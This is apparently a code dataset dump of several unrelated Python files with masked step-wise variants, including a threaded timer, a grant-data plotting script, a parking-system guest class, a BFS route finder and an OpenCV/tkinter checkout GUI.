#!/usr/bin/env python #coding=UTF8 ''' @author: devin @time: 2013-11-23 @desc: timer ''' import threading import time class Timer(threading.Thread): ''' 每隔一段时间执行一遍任务 ''' def __init__(self, seconds, fun, **kwargs): ''' seconds为间隔时间,单位为秒 fun为定时执行的任务 args为fun对应的参数 ''' self.sleep_time = seconds threading.Thread.__init__(self) self.fun = fun self.kwargs = kwargs self.is_stop = threading.Event() def run(self): while not self.is_stop.is_set(): self.fun(**self.kwargs) self.is_stop.wait(timeout=self.sleep_time) def stop(self, *args): self.is_stop.set() class CountDownTimer(Timer): ''' 一共执行指定次数 ''' def __init__(self, seconds, total_times, fun, **args): ''' total_times为总共执行的次数 其它参数同Timer ''' self.total_times = total_times Timer.__init__(self, seconds, fun, args) def run(self): counter = 0 while counter < self.total_times and self.is_run: time.sleep(self.sleep_time) self.fun(**self.args) counter += 1 if __name__ == "__main__": def test(s): print s timer = Timer(2, test, s="a") timer.start() import signal signal.signal(signal.SIGINT, timer.stop) signal.signal(signal.SIGTERM, timer.stop) signal.pause()
normal
{ "blob_id": "4a546222082e2a25296e31f715baf594c974b7ad", "index": 5844, "step-1": "#!/usr/bin/env python\n#coding=UTF8\n'''\n @author: devin\n @time: 2013-11-23\n @desc:\n timer\n'''\nimport threading\nimport time\n\nclass Timer(threading.Thread):\n '''\n 每隔一段时间执行一遍任务\n '''\n def __init__(self, seconds, fun, **kwargs):\n '''\n seconds为间隔时间,单位为秒\n fun为定时执行的任务\n args为fun对应的参数\n '''\n self.sleep_time = seconds\n threading.Thread.__init__(self)\n self.fun = fun\n self.kwargs = kwargs\n self.is_stop = threading.Event()\n\n def run(self):\n while not self.is_stop.is_set():\n self.fun(**self.kwargs)\n self.is_stop.wait(timeout=self.sleep_time)\n\n def stop(self, *args):\n self.is_stop.set()\n\nclass CountDownTimer(Timer):\n '''\n 一共执行指定次数\n '''\n def __init__(self, seconds, total_times, fun, **args):\n '''\n total_times为总共执行的次数\n 其它参数同Timer\n '''\n self.total_times = total_times\n Timer.__init__(self, seconds, fun, args)\n \n def run(self):\n counter = 0\n while counter < self.total_times and self.is_run:\n time.sleep(self.sleep_time)\n self.fun(**self.args)\n counter += 1\n\n\nif __name__ == \"__main__\":\n def test(s):\n print s\n timer = Timer(2, test, s=\"a\")\n timer.start()\n import signal\n signal.signal(signal.SIGINT, timer.stop)\n signal.signal(signal.SIGTERM, timer.stop)\n signal.pause()\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import numpy as np import matplotlib.pyplot as plt import csv category = ["Ecological Well-being", "Health & Human Services", "Arts & Culture", "Community Building", "Environment"] arr = np.empty((0, 6), str) moneyGranted = [[0]*5 for _ in range(6)] moneyRequested = [[0]*5 for _ in range(6)] perFull = [[0]*5 for _ in range(6)] def task5(arr): # function definition; be sure to add your task number after 'task' # Write your code here for row in arr: moneyGranted[int(row[1])-2015][int(row[3])-1] += int(row[4]) moneyRequested[int(row[1])-2015][int(row[3])-1] += int(row[5]) for i in range(6): for j in range(5): if moneyRequested[i][j] == 0: print(i+2015,",",category[j],":", "0.0%") else: perFull[i][j] = round((moneyGranted[i][j] / moneyRequested[i][j])*100, 2) print(i+2015,",",category[j],":", perFull[i][j],"%") for i in range(6): graphTitle = "Percentage fulfilled for each category in " + str(i+2015) plt.title(graphTitle) plt.bar(category, perFull[i]) plt.show() with open('CEL_HistoricalGrantInformation_2014-7Oct2020_CSV.csv', newline='') as csvfile: # reading the csv file reader = csv.DictReader(csvfile) for row in reader: arr = np.append(arr, np.array([[row['organization_id'], int(row['year_id']), row['process_id'], int(row['area_id']), int(row['awarded_id']), int(row['requested_id'])]]), axis=0) #print(arr) task5(arr)
normal
{ "blob_id": "e7b2e716fbcaf761e119003000bf1b16af57a2b7", "index": 7009, "step-1": "<mask token>\n\n\ndef task5(arr):\n for row in arr:\n moneyGranted[int(row[1]) - 2015][int(row[3]) - 1] += int(row[4])\n moneyRequested[int(row[1]) - 2015][int(row[3]) - 1] += int(row[5])\n for i in range(6):\n for j in range(5):\n if moneyRequested[i][j] == 0:\n print(i + 2015, ',', category[j], ':', '0.0%')\n else:\n perFull[i][j] = round(moneyGranted[i][j] / moneyRequested[i\n ][j] * 100, 2)\n print(i + 2015, ',', category[j], ':', perFull[i][j], '%')\n for i in range(6):\n graphTitle = 'Percentage fulfilled for each category in ' + str(i +\n 2015)\n plt.title(graphTitle)\n plt.bar(category, perFull[i])\n plt.show()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef task5(arr):\n for row in arr:\n moneyGranted[int(row[1]) - 2015][int(row[3]) - 1] += int(row[4])\n moneyRequested[int(row[1]) - 2015][int(row[3]) - 1] += int(row[5])\n for i in range(6):\n for j in range(5):\n if moneyRequested[i][j] == 0:\n print(i + 2015, ',', category[j], ':', '0.0%')\n else:\n perFull[i][j] = round(moneyGranted[i][j] / moneyRequested[i\n ][j] * 100, 2)\n print(i + 2015, ',', category[j], ':', perFull[i][j], '%')\n for i in range(6):\n graphTitle = 'Percentage fulfilled for each category in ' + str(i +\n 2015)\n plt.title(graphTitle)\n plt.bar(category, perFull[i])\n plt.show()\n\n\nwith open('CEL_HistoricalGrantInformation_2014-7Oct2020_CSV.csv', newline=''\n ) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n arr = np.append(arr, np.array([[row['organization_id'], int(row[\n 'year_id']), row['process_id'], int(row['area_id']), int(row[\n 'awarded_id']), int(row['requested_id'])]]), axis=0)\ntask5(arr)\n", "step-3": "<mask token>\ncategory = ['Ecological Well-being', 'Health & Human Services',\n 'Arts & Culture', 'Community Building', 'Environment']\narr = np.empty((0, 6), str)\nmoneyGranted = [([0] * 5) for _ in range(6)]\nmoneyRequested = [([0] * 5) for _ in range(6)]\nperFull = [([0] * 5) for _ in range(6)]\n\n\ndef task5(arr):\n for row in arr:\n moneyGranted[int(row[1]) - 2015][int(row[3]) - 1] += int(row[4])\n moneyRequested[int(row[1]) - 2015][int(row[3]) - 1] += int(row[5])\n for i in range(6):\n for j in range(5):\n if moneyRequested[i][j] == 0:\n print(i + 2015, ',', category[j], ':', '0.0%')\n else:\n perFull[i][j] = round(moneyGranted[i][j] / moneyRequested[i\n ][j] * 100, 2)\n print(i + 2015, ',', category[j], ':', perFull[i][j], '%')\n for i in range(6):\n graphTitle = 'Percentage fulfilled for each category in ' + str(i +\n 2015)\n plt.title(graphTitle)\n plt.bar(category, perFull[i])\n plt.show()\n\n\nwith open('CEL_HistoricalGrantInformation_2014-7Oct2020_CSV.csv', newline=''\n ) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n arr = np.append(arr, np.array([[row['organization_id'], int(row[\n 'year_id']), row['process_id'], int(row['area_id']), int(row[\n 'awarded_id']), int(row['requested_id'])]]), axis=0)\ntask5(arr)\n", "step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\ncategory = ['Ecological Well-being', 'Health & Human Services',\n 'Arts & Culture', 'Community Building', 'Environment']\narr = np.empty((0, 6), str)\nmoneyGranted = [([0] * 5) for _ in range(6)]\nmoneyRequested = [([0] * 5) for _ in range(6)]\nperFull = [([0] * 5) for _ in range(6)]\n\n\ndef task5(arr):\n for row in arr:\n moneyGranted[int(row[1]) - 2015][int(row[3]) - 1] += int(row[4])\n moneyRequested[int(row[1]) - 2015][int(row[3]) - 1] += int(row[5])\n for i in range(6):\n for j in range(5):\n if moneyRequested[i][j] == 0:\n print(i + 2015, ',', category[j], ':', '0.0%')\n else:\n perFull[i][j] = round(moneyGranted[i][j] / moneyRequested[i\n ][j] * 100, 2)\n print(i + 2015, ',', category[j], ':', perFull[i][j], '%')\n for i in range(6):\n graphTitle = 'Percentage fulfilled for each category in ' + str(i +\n 2015)\n plt.title(graphTitle)\n plt.bar(category, perFull[i])\n plt.show()\n\n\nwith open('CEL_HistoricalGrantInformation_2014-7Oct2020_CSV.csv', newline=''\n ) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n arr = np.append(arr, np.array([[row['organization_id'], int(row[\n 'year_id']), row['process_id'], int(row['area_id']), int(row[\n 'awarded_id']), int(row['requested_id'])]]), axis=0)\ntask5(arr)\n", "step-5": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\n\r\ncategory = [\"Ecological Well-being\", \"Health & Human Services\", \"Arts & Culture\", \"Community Building\", \"Environment\"]\r\narr = np.empty((0, 6), str)\r\nmoneyGranted = [[0]*5 for _ in range(6)]\r\nmoneyRequested = [[0]*5 for _ in range(6)]\r\nperFull = [[0]*5 for _ in range(6)]\r\n\r\n\r\ndef task5(arr): # function definition; be sure to add your task number after 'task'\r\n # Write your code here\r\n\r\n for row in arr:\r\n moneyGranted[int(row[1])-2015][int(row[3])-1] += int(row[4])\r\n moneyRequested[int(row[1])-2015][int(row[3])-1] += int(row[5]) \r\n \r\n for i in range(6):\r\n for j in range(5):\r\n if moneyRequested[i][j] == 0:\r\n print(i+2015,\",\",category[j],\":\", \"0.0%\")\r\n else:\r\n perFull[i][j] = round((moneyGranted[i][j] / moneyRequested[i][j])*100, 2)\r\n print(i+2015,\",\",category[j],\":\", perFull[i][j],\"%\")\r\n for i in range(6):\r\n graphTitle = \"Percentage fulfilled for each category in \" + str(i+2015) \r\n plt.title(graphTitle) \r\n plt.bar(category, perFull[i]) \r\n plt.show() \r\n\r\n \r\n\r\nwith open('CEL_HistoricalGrantInformation_2014-7Oct2020_CSV.csv', newline='') as csvfile: # reading the csv file\r\n reader = csv.DictReader(csvfile)\r\n for row in reader:\r\n arr = np.append(arr, np.array([[row['organization_id'], int(row['year_id']), row['process_id'],\r\n int(row['area_id']), int(row['awarded_id']), int(row['requested_id'])]]), axis=0)\r\n\r\n #print(arr)\r\n\r\ntask5(arr)\r\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
class BaseService: def __init__(self, context): self._context = context def post(self, path, body): result = self._context.http.post(path, body) return result.json()["Data"]
normal
{ "blob_id": "5000663e3cde9c1a1100c9022707ccae13db0034", "index": 1426, "step-1": "<mask token>\n", "step-2": "class BaseService:\n <mask token>\n <mask token>\n", "step-3": "class BaseService:\n <mask token>\n\n def post(self, path, body):\n result = self._context.http.post(path, body)\n return result.json()['Data']\n", "step-4": "class BaseService:\n\n def __init__(self, context):\n self._context = context\n\n def post(self, path, body):\n result = self._context.http.post(path, body)\n return result.json()['Data']\n", "step-5": "class BaseService:\n\n def __init__(self, context):\n self._context = context\n\n def post(self, path, body):\n result = self._context.http.post(path, body)\n\n return result.json()[\"Data\"]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from datetime import datetime class Guest: def __init__(self, Name, FamilyName, Car, controlboard, CarRotationManager, ID=0, linkedplatform=None,Start=0): # --Initializing Guest credentials/info--- self.Name = Name self.FamilyName = FamilyName self.Car = Car self.controlboard = controlboard self.CarRotationManager = CarRotationManager if ID == 0: # In this case, the guest would be a new guest, so when we register him as a guest we don't give him an ID, and we ask the controlboard to generate the ID self.uniqueID = controlboard.set_id() # ----calling controlboard class to set ID---unique ID given by control board/decision engine else: # In this case, the guest would have already parked before and he would already have an ID, so instead of generating a new ID we just give him his old one self.uniqueID = ID self.parked = False # Boolean variable which indicates if guest is parked or not self.linkedplatform = None # Variable containing the platform where the guest's car is parked self.Start=Start # This is the time when the guest parks def parked_and_linkedplatform_value(self): # This function checks if the guest is parked and sets the values of linkedplatform and parked accordingly (boolean, linkedplatform) = self.CarRotationManager.check_if_guest_parked(self) if boolean == True: self.parked = True self.linkedplatform = linkedplatform else: self.parked = False self.linkedplatform = None def request_car(self): # Function that releases the car if it is parked self.parked_and_linkedplatform_value() if self.parked == False: print("Your car is not parked!\n") return pos = self.CarRotationManager.get_platform_position(self) # Get the car's current position in the parking if (pos == -1): print("Your car is not parked!\n") return self.CarRotationManager.return_platform_to_base(pos) # Move the car to the base position self.CarRotationManager.release_car(self.linkedplatform) # Release the car self.parked = False self.CarRotationManager.occupiedPlatforms = self.CarRotationManager.occupiedPlatforms - 1 print("Your " + self.Car.model + " has been released.") print("Have a great day " + self.Name + "!\n") self.controlboard.remove_guest_from_file(self) # We remove the guest from the file once his car is not parked anymore def park_car(self): # Function that parks the guest's car if it's not already parked self.parked_and_linkedplatform_value() if (self.parked == True): print("Your car is already parked!\n") return platform = self.CarRotationManager.return_empty_platform() # FOUND CLOSEST EMPTY PLATFORM if (platform == None): return -1 # PARKING IS FULL self.CarRotationManager.return_platform_to_base(platform.Position) platform.link(self) # NOW USER'S CAR IS PARKED ON BASE PLATFORM self.linkedplatform = platform self.parked = True self.CarRotationManager.occupiedPlatforms = self.CarRotationManager.occupiedPlatforms + 1 print("Your " + self.Car.model + " has been parked!\n") now = datetime.now() # Get the current time, i.e when the user parks his car array = str(now).split() string_into_file = array[0] + "@" + array[1] self.controlboard.add_guest_to_file(self,string_into_file) # Add the current time (when the user parked) next to his information in the guest file self.Start=string_into_file
normal
{ "blob_id": "3553fa72cb831f82a1030b9eadc9594eee1d1422", "index": 2152, "step-1": "<mask token>\n\n\nclass Guest:\n <mask token>\n\n def parked_and_linkedplatform_value(self):\n boolean, linkedplatform = (self.CarRotationManager.\n check_if_guest_parked(self))\n if boolean == True:\n self.parked = True\n self.linkedplatform = linkedplatform\n else:\n self.parked = False\n self.linkedplatform = None\n <mask token>\n\n def park_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == True:\n print('Your car is already parked!\\n')\n return\n platform = self.CarRotationManager.return_empty_platform()\n if platform == None:\n return -1\n self.CarRotationManager.return_platform_to_base(platform.Position)\n platform.link(self)\n self.linkedplatform = platform\n self.parked = True\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms + 1)\n print('Your ' + self.Car.model + ' has been parked!\\n')\n now = datetime.now()\n array = str(now).split()\n string_into_file = array[0] + '@' + array[1]\n self.controlboard.add_guest_to_file(self, string_into_file)\n self.Start = string_into_file\n", "step-2": "<mask token>\n\n\nclass Guest:\n <mask token>\n\n def parked_and_linkedplatform_value(self):\n boolean, linkedplatform = (self.CarRotationManager.\n check_if_guest_parked(self))\n if boolean == True:\n self.parked = True\n self.linkedplatform = linkedplatform\n else:\n self.parked = False\n self.linkedplatform = None\n\n def request_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == False:\n print('Your car is not parked!\\n')\n return\n pos = self.CarRotationManager.get_platform_position(self)\n if pos == -1:\n print('Your car is not parked!\\n')\n return\n self.CarRotationManager.return_platform_to_base(pos)\n self.CarRotationManager.release_car(self.linkedplatform)\n self.parked = False\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms - 1)\n print('Your ' + self.Car.model + ' has been released.')\n print('Have a great day ' + self.Name + '!\\n')\n self.controlboard.remove_guest_from_file(self)\n\n def park_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == True:\n print('Your car is already parked!\\n')\n return\n platform = self.CarRotationManager.return_empty_platform()\n if platform == None:\n return -1\n self.CarRotationManager.return_platform_to_base(platform.Position)\n platform.link(self)\n self.linkedplatform = platform\n self.parked = True\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms + 1)\n print('Your ' + self.Car.model + ' has been parked!\\n')\n now = datetime.now()\n array = str(now).split()\n string_into_file = array[0] + '@' + array[1]\n self.controlboard.add_guest_to_file(self, string_into_file)\n self.Start = string_into_file\n", "step-3": "<mask token>\n\n\nclass Guest:\n\n def __init__(self, Name, FamilyName, Car, controlboard,\n CarRotationManager, ID=0, linkedplatform=None, Start=0):\n self.Name = Name\n self.FamilyName = FamilyName\n self.Car = Car\n self.controlboard = controlboard\n self.CarRotationManager = CarRotationManager\n if ID == 0:\n self.uniqueID = controlboard.set_id()\n else:\n self.uniqueID = ID\n self.parked = False\n self.linkedplatform = None\n self.Start = Start\n\n def parked_and_linkedplatform_value(self):\n boolean, linkedplatform = (self.CarRotationManager.\n check_if_guest_parked(self))\n if boolean == True:\n self.parked = True\n self.linkedplatform = linkedplatform\n else:\n self.parked = False\n self.linkedplatform = None\n\n def request_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == False:\n print('Your car is not parked!\\n')\n return\n pos = self.CarRotationManager.get_platform_position(self)\n if pos == -1:\n print('Your car is not parked!\\n')\n return\n self.CarRotationManager.return_platform_to_base(pos)\n self.CarRotationManager.release_car(self.linkedplatform)\n self.parked = False\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms - 1)\n print('Your ' + self.Car.model + ' has been released.')\n print('Have a great day ' + self.Name + '!\\n')\n self.controlboard.remove_guest_from_file(self)\n\n def park_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == True:\n print('Your car is already parked!\\n')\n return\n platform = self.CarRotationManager.return_empty_platform()\n if platform == None:\n return -1\n self.CarRotationManager.return_platform_to_base(platform.Position)\n platform.link(self)\n self.linkedplatform = platform\n self.parked = True\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms + 1)\n print('Your ' + self.Car.model + ' has been parked!\\n')\n now = datetime.now()\n array = str(now).split()\n string_into_file = array[0] + '@' + array[1]\n self.controlboard.add_guest_to_file(self, string_into_file)\n self.Start = string_into_file\n", "step-4": "from datetime import datetime\n\n\nclass Guest:\n\n def __init__(self, Name, FamilyName, Car, controlboard,\n CarRotationManager, ID=0, linkedplatform=None, Start=0):\n self.Name = Name\n self.FamilyName = FamilyName\n self.Car = Car\n self.controlboard = controlboard\n self.CarRotationManager = CarRotationManager\n if ID == 0:\n self.uniqueID = controlboard.set_id()\n else:\n self.uniqueID = ID\n self.parked = False\n self.linkedplatform = None\n self.Start = Start\n\n def parked_and_linkedplatform_value(self):\n boolean, linkedplatform = (self.CarRotationManager.\n check_if_guest_parked(self))\n if boolean == True:\n self.parked = True\n self.linkedplatform = linkedplatform\n else:\n self.parked = False\n self.linkedplatform = None\n\n def request_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == False:\n print('Your car is not parked!\\n')\n return\n pos = self.CarRotationManager.get_platform_position(self)\n if pos == -1:\n print('Your car is not parked!\\n')\n return\n self.CarRotationManager.return_platform_to_base(pos)\n self.CarRotationManager.release_car(self.linkedplatform)\n self.parked = False\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms - 1)\n print('Your ' + self.Car.model + ' has been released.')\n print('Have a great day ' + self.Name + '!\\n')\n self.controlboard.remove_guest_from_file(self)\n\n def park_car(self):\n self.parked_and_linkedplatform_value()\n if self.parked == True:\n print('Your car is already parked!\\n')\n return\n platform = self.CarRotationManager.return_empty_platform()\n if platform == None:\n return -1\n self.CarRotationManager.return_platform_to_base(platform.Position)\n platform.link(self)\n self.linkedplatform = platform\n self.parked = True\n self.CarRotationManager.occupiedPlatforms = (self.\n CarRotationManager.occupiedPlatforms + 1)\n print('Your ' + self.Car.model + ' has been parked!\\n')\n now = datetime.now()\n array = str(now).split()\n string_into_file = array[0] + '@' + array[1]\n self.controlboard.add_guest_to_file(self, string_into_file)\n self.Start = string_into_file\n", "step-5": "from datetime import datetime\r\n\r\nclass Guest:\r\n def __init__(self, Name, FamilyName, Car, controlboard,\r\n CarRotationManager, ID=0, linkedplatform=None,Start=0): # --Initializing Guest credentials/info---\r\n self.Name = Name\r\n self.FamilyName = FamilyName\r\n self.Car = Car\r\n self.controlboard = controlboard\r\n self.CarRotationManager = CarRotationManager\r\n if ID == 0: # In this case, the guest would be a new guest, so when we register him as a guest we don't give him an ID, and we ask the controlboard to generate the ID\r\n self.uniqueID = controlboard.set_id() # ----calling controlboard class to set ID---unique ID given by control board/decision engine\r\n else: # In this case, the guest would have already parked before and he would already have an ID, so instead of generating a new ID we just give him his old one\r\n self.uniqueID = ID\r\n self.parked = False # Boolean variable which indicates if guest is parked or not\r\n self.linkedplatform = None # Variable containing the platform where the guest's car is parked\r\n self.Start=Start # This is the time when the guest parks\r\n\r\n def parked_and_linkedplatform_value(self): # This function checks if the guest is parked and sets the values of linkedplatform and parked accordingly\r\n (boolean, linkedplatform) = self.CarRotationManager.check_if_guest_parked(self)\r\n if boolean == True:\r\n self.parked = True\r\n self.linkedplatform = linkedplatform\r\n else:\r\n self.parked = False\r\n self.linkedplatform = None\r\n\r\n def request_car(self): # Function that releases the car if it is parked\r\n self.parked_and_linkedplatform_value()\r\n if self.parked == False:\r\n print(\"Your car is not parked!\\n\")\r\n return\r\n pos = self.CarRotationManager.get_platform_position(self) # Get the car's current position in the parking\r\n if (pos == -1):\r\n print(\"Your car is not parked!\\n\")\r\n return\r\n self.CarRotationManager.return_platform_to_base(pos) # Move the car to the base position\r\n self.CarRotationManager.release_car(self.linkedplatform) # Release the car\r\n self.parked = False\r\n self.CarRotationManager.occupiedPlatforms = self.CarRotationManager.occupiedPlatforms - 1\r\n print(\"Your \" + self.Car.model + \" has been released.\")\r\n print(\"Have a great day \" + self.Name + \"!\\n\")\r\n self.controlboard.remove_guest_from_file(self) # We remove the guest from the file once his car is not parked anymore\r\n\r\n def park_car(self): # Function that parks the guest's car if it's not already parked\r\n self.parked_and_linkedplatform_value()\r\n if (self.parked == True):\r\n print(\"Your car is already parked!\\n\")\r\n return\r\n platform = self.CarRotationManager.return_empty_platform() # FOUND CLOSEST EMPTY PLATFORM\r\n if (platform == None):\r\n return -1 # PARKING IS FULL\r\n self.CarRotationManager.return_platform_to_base(platform.Position)\r\n platform.link(self) # NOW USER'S CAR IS PARKED ON BASE PLATFORM\r\n self.linkedplatform = platform\r\n self.parked = True\r\n self.CarRotationManager.occupiedPlatforms = self.CarRotationManager.occupiedPlatforms + 1\r\n print(\"Your \" + self.Car.model + \" has been parked!\\n\")\r\n now = datetime.now() # Get the current time, i.e when the user parks his car\r\n array = str(now).split()\r\n string_into_file = array[0] + \"@\" + array[1]\r\n self.controlboard.add_guest_to_file(self,string_into_file) # Add the current time (when the user parked) next to his information in the guest file\r\n self.Start=string_into_file\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
from collections import deque def safeInsert(graph,left,right): if left not in graph: graph[left] = {} graph[left][right] = True if right not in graph: graph[right] = {} graph[right][left] = True def trace(graph,start,end): queue = deque([start]) pred = {start:None} while len(queue)>0: cur = queue.popleft() if cur in graph: for neigh in graph[cur]: if neigh not in pred: pred[neigh] = cur queue.append(neigh) if end not in pred: return "no route found" else: stack = [end] while pred[stack[-1]]!=None: stack.append(pred[stack[-1]]) stack = stack[::-1] return " ".join(stack) graph = {} n = int(raw_input()) for i in xrange(n): line = raw_input().split() for neigh in line[1:]: safeInsert(graph,line[0],neigh) start,end = raw_input().split() print trace(graph,start,end)
normal
{ "blob_id": "3f655a12ac45c152215949d3d8bdb71147eeb849", "index": 3651, "step-1": "from collections import deque\n\ndef safeInsert(graph,left,right):\n\tif left not in graph:\n\t\tgraph[left] = {}\n\tgraph[left][right] = True\n\tif right not in graph:\n\t\tgraph[right] = {}\n\tgraph[right][left] = True\n\ndef trace(graph,start,end):\n\tqueue = deque([start])\n\tpred = {start:None}\n\twhile len(queue)>0:\n\t\tcur = queue.popleft()\n\t\tif cur in graph:\n\t\t\tfor neigh in graph[cur]:\n\t\t\t\tif neigh not in pred:\n\t\t\t\t\tpred[neigh] = cur\n\t\t\t\t\tqueue.append(neigh)\n\tif end not in pred:\n\t\treturn \"no route found\"\n\telse:\n\t\tstack = [end]\n\t\twhile pred[stack[-1]]!=None:\n\t\t\tstack.append(pred[stack[-1]])\n\t\tstack = stack[::-1]\n\t\treturn \" \".join(stack)\n\ngraph = {}\n\nn = int(raw_input())\n\nfor i in xrange(n):\n\tline = raw_input().split()\n\tfor neigh in line[1:]:\n\t\tsafeInsert(graph,line[0],neigh)\n\nstart,end = raw_input().split()\n\nprint trace(graph,start,end)", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#Main thread for starting the gui import cv2 import PIL from PIL import Image,ImageTk from tkinter import * from matplotlib import pyplot as pt from matplotlib.image import imread from control.control import Control control=Control() #gives the indtruction for saving the current frame def takePicture(): global setImage setImage=True #add the rectangles to the image where the IA found a products #**ARGS: List with the triangles def addRectangles (locations): _, axe = pt.subplots() img=imread("hola.jpg") cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA) axe.imshow(cv2image) alto, ancho, _ = img.shape for item in locations: axe.add_patch(item) pt.savefig('result.png') #window metric width, height = 800, 700 #we use open cv to take the frames cap = cv2.VideoCapture(0) cap.set(cv2.CAP_PROP_FRAME_WIDTH, width) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height) #UI elementes root = Tk() root.bind('<Escape>', lambda e: root.quit()) lmain = Label(root) lmain.pack() lProccessedData = Label(root) lProccessedData.pack() B = Button( text ="Start", command = takePicture) B.pack() textEditor = Text(root, width=43, height=5) textEditor.pack() textEditor.place(x=400, y=400) #Initial wigets state setImage=False selectedImage=None root.geometry("900x600") root.resizable(False, False) #set the total price #**ARGS: List with all the products found def set_count(products): div={"Harina de Trigo La Nieve":1700,"Papitas margarita":1000,"Lentejas":1800,"Shampoo":13900,"Tarrito rojo":13000,"Polvo de bizcocho":2000} div_temp=[] a="" b=0 print(products) for item in products: if item in div_temp: continue div_temp.append(item) c=products.count(item)*div[item] b=b+c print (item) a=a+item+ " "+str(products.count(item))+ " " +str(c)+" \n" textEditor.insert('1.0', "") a=a+" \n\n\n Toral:"+str(b)+"\n\n" textEditor.insert('1.0', a) #show the frame captured by the camera def show_frame(): global setImage global selectedImage _, frame = cap.read() frame = cv2.flip(frame, 1) cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) orig=cv2image img = PIL.Image.fromarray(cv2image) img=img.resize((400, 300)) imgtk = ImageTk.PhotoImage(image=img) lmain.imgtk = imgtk lmain.configure(image=imgtk) if setImage: selectedImage=frame setImage = False cv2.imwrite('hola.jpg', selectedImage) res=control.get_results('hola.jpg') addRectangles(res[0]) set_count(res[1]) selectedImage=cv2.imread('result.png') selectedImage=PIL.Image.fromarray(selectedImage) selectedImage=selectedImage.resize((400, 300)) imgtk = ImageTk.PhotoImage(image=selectedImage) selectedImage=imgtk B["state"] = NORMAL lmain.after(10, show_frame) lmain.place(x=10, y=40) B.place(x=10, y=500) lProccessedData.place(x=470, y=40) lProccessedData.configure(image=selectedImage) #Start UI show_frame() root.mainloop()
normal
{ "blob_id": "8d8c211895fd43b1e2a38216693b0c00f6f76756", "index": 5748, "step-1": "<mask token>\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\n<mask token>\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\n<mask token>\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n<mask token>\nroot.bind('<Escape>', lambda e: root.quit())\n<mask token>\nlmain.pack()\n<mask token>\nlProccessedData.pack()\n<mask token>\nB.pack()\n<mask token>\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\n<mask token>\nroot.geometry('900x600')\nroot.resizable(False, False)\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n 